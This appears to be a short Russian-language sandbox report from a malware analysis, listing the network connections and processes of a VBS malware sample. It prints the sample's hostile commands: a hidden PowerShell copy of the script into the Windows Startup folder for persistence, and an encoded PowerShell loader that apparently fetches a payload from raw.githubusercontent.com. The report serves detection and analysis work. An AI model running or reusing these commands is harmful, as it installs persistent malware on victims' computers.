Техническая информация
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK ra#.####ubusercontent.com
- '<SYSTEM32>\cmd.exe' /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Progra... (со скрытым окном)
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 10
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command [System.IO.File]::Copy('<SYSTEM32>\<Имя файла>.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.alevuorap.vbs')')
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'KCdWZ01pbWFnZVVybCA9IDgwRWh0dHBzOi8vcmF3LicrJ2dpdGh1YnVzZXJjb250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpJysnY2lhbC9aSVAvcmVmcy9oZScrJ2Fkcy9tYWluL0RldGFoTm90ZV9WLmpwJysnZyA4MEU7V... (со скрытым окном)